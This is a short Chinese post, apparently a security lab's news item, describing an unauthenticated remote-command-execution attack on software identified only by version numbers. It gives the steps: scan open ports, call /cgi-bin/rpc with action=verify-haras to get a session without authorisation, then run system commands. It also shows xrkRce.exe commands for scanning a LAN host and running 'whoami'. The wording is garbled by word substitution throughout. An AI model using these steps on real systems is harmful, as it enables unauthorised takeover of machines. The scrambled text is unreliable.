新闻动态
· 11.1.1
· 10.3.0.27372
· 11.0.0.33162
1、 接见扫描盛开的端口
2、 必要获取到session,测试指标是否存在/cgi-bin/rpc界面
3、 在/cgi-bin/rpc 中,传入action=verify-haras参数即可在未授权的情况下拿到有效session
4、 使用获取到的session执行系统号令
1、 运行号令得到缝隙端口:xrkRce.exe -h 192.168.16.128 -t scan
2、 执行系统号令:xrkRce.exe -h 192.168.16.128 -t rce -p 49156 -c "whoami"
本文仅限于幼我进建和技术钻研,由于传布、利用此文所提供的信息而造成刑事案件、非授权攻击等违法行为,均由使用者自己掌管,本单元不为此承担任何责任。创安攻防尝试室占有对此文章的批改和诠释权,如欲转载或传布此文章,必须保障此文章的齐全性,蕴含版权申明等全数内容。
如有侵权,请联系后盾。